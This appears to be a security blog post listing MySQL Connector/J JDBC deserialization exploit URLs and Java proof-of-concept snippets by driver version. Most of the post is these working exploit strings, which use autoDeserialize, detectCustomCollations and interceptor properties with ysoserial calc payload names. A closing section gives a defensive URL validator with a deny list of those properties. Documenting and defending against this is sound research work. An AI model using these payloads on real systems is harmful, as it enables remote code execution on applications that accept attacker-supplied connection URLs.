JDBC Deserialization

The JDBC deserialization injection point is, in every version, the user parameter.
An overview follows:

detectCustomCollations chain

  • 5.1.19-5.1.28: jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&user=yso_JRE8u20_calc
  • 5.1.29-5.1.48: jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_JRE8u20_calc
  • 5.1.49: not usable
  • 6.0.2-6.0.6: jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_JRE8u20_calc
  • 8.x.x: not usable

ServerStatusDiffInterceptor chain

  • 5.1.0-5.1.10: jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc (a query must be executed after connecting)
  • 5.1.11-5.x.xx: jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc
  • 6.x: jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc (cj added to the package name)
  • below 8.0.20: jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc

detectCustomCollations

5.1.19~5.1.28

```java
// Connector/J 5.1.19~5.1.28: autoDeserialize=true alone is enough; the payload is selected by the user value
String url = "jdbc:mysql://127.0.0.1:3308/test?autoDeserialize=true&user=u0f139c";
String username = "root";
String password = "root";
Class.forName("com.mysql.jdbc.Driver");
DriverManager.getConnection(url, username, password);
```

5.1.19~5.1.40

```java
// Connector/J 5.1.19~5.1.40: detectCustomCollations=true must be added alongside autoDeserialize=true
String url = "jdbc:mysql://127.0.0.1:3308/test?detectCustomCollations=true&autoDeserialize=true&user=u0f139c";
String username = "root";
String password = "root";
Class.forName("com.mysql.jdbc.Driver");
DriverManager.getConnection(url, username, password);
```

6.0.2~6.0.6

```java
// Connector/J 6.0.2~6.0.6: same URL as the 5.1.x variant above
String url = "jdbc:mysql://127.0.0.1:3308/test?detectCustomCollations=true&autoDeserialize=true&user=u0f139c";
String username = "root";
String password = "root";
Class.forName("com.mysql.jdbc.Driver");
DriverManager.getConnection(url, username, password);
```
ServerStatusDiffInterceptor

5.1.0~5.1.10

A query against the database must be executed before it triggers.
However, my test did not succeed.

```java
// Connector/J 5.1.0~5.1.10: the interceptor only fires once a statement is executed, so a query follows the connect
String url = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections4_calc";
String username = "yso_CommonsCollections4_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
Connection conn = DriverManager.getConnection(url, username, password);
String sql = "select database()";
PreparedStatement ps = conn.prepareStatement(sql);
// Execute the query; the return value is the result set
ResultSet resultSet = ps.executeQuery();
```
5.1.11~5.x.xx

```java
// Connector/J 5.1.11~5.x.xx: the connect alone triggers the interceptor
String url = "jdbc:mysql://127.0.0.1:3308/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=u676c17";
String username = "root";
String password = "root";
Class.forName("com.mysql.jdbc.Driver");
DriverManager.getConnection(url, username, password);
```

6.x

```java
// Connector/J 6.x: the interceptor lives under com.mysql.cj.jdbc.interceptors
String url = "jdbc:mysql://127.0.0.1:3308/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=u676c17";
String username = "root";
String password = "root";
Class.forName("com.mysql.jdbc.Driver");
DriverManager.getConnection(url, username, password);
```

8.0.7~8.0.20

```java
// Connector/J 8.0.7~8.0.20: the property is now named queryInterceptors
String url = "jdbc:mysql://127.0.0.1:3308/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=u676c17";
String username = "root";
String password = "root";
Class.forName("com.mysql.jdbc.Driver");
DriverManager.getConnection(url, username, password);
```
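Every payload above depends on a caller being able to put autoDeserialize, detectCustomCollations, statementInterceptors or queryInterceptors into the connection URL. As an added mitigation example (not code from this post), the check below rejects a caller-supplied Connector/J URL that carries any of those properties or points at a host outside an allowlist; `JdbcUrlGuard` and the host `db.internal.example` are assumptions.

```java
import java.net.URI;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.*;

// Hypothetical helper, not from the post: checks a caller-supplied Connector/J URL
// before it reaches DriverManager.getConnection(). Requires Java 10+ (URLDecoder with Charset).
public final class JdbcUrlGuard {
    // Properties every payload above relies on; a normal application never needs them,
    // so any occurrence is rejected (keys compared case-insensitively, to be conservative).
    private static final Set<String> DENIED = new HashSet<>(Arrays.asList(
            "autodeserialize", "detectcustomcollations",
            "statementinterceptors", "queryinterceptors"));
    // Constructed allowlist: the only database hosts this application may connect to.
    private static final Set<String> ALLOWED_HOSTS = new HashSet<>(Arrays.asList("db.internal.example"));

    /** Splits everything after '?' into decoded key/value pairs, keys lower-cased. */
    static Map<String, String> queryParams(String jdbcUrl) {
        Map<String, String> out = new LinkedHashMap<>();
        int q = jdbcUrl.indexOf('?');
        if (q < 0) return out;
        for (String pair : jdbcUrl.substring(q + 1).split("&")) {
            if (pair.isEmpty()) continue;
            int eq = pair.indexOf('=');
            String k = eq < 0 ? pair : pair.substring(0, eq);
            String v = eq < 0 ? "" : pair.substring(eq + 1);
            out.put(URLDecoder.decode(k, StandardCharsets.UTF_8).trim().toLowerCase(Locale.ROOT),
                    URLDecoder.decode(v, StandardCharsets.UTF_8));
        }
        return out;
    }

    /** Throws unless the URL is a plain jdbc:mysql:// URL to an allowed host with no denied property. */
    static void validate(String jdbcUrl) {
        if (!jdbcUrl.startsWith("jdbc:mysql://"))
            throw new IllegalArgumentException("only plain jdbc:mysql:// URLs are accepted");
        // URI.create also throws on malformed input; multi-host forms yield a null host and are rejected
        String host = URI.create(jdbcUrl.substring("jdbc:".length())).getHost();
        if (host == null || !ALLOWED_HOSTS.contains(host))
            throw new IllegalArgumentException("database host not allowed: " + host);
        for (String key : queryParams(jdbcUrl).keySet())
            if (DENIED.contains(key))
                throw new IllegalArgumentException("deserialization-related property rejected: " + key);
    }

    public static void main(String[] args) {
        validate("jdbc:mysql://db.internal.example:3306/test?useSSL=true");   // accepted
        try {   // same host, but carries the property the payloads above depend on
            validate("jdbc:mysql://db.internal.example:3306/test?autoDeserialize=true&user=x");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same keys must also be checked in any Properties object handed to getConnection(), since Connector/J reads connection properties from there as well; where the application does not need user-supplied URLs at all, hard-coding the URL server-side removes the injection point entirely.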
posted @ 2025-02-01 23:29  colorfullbz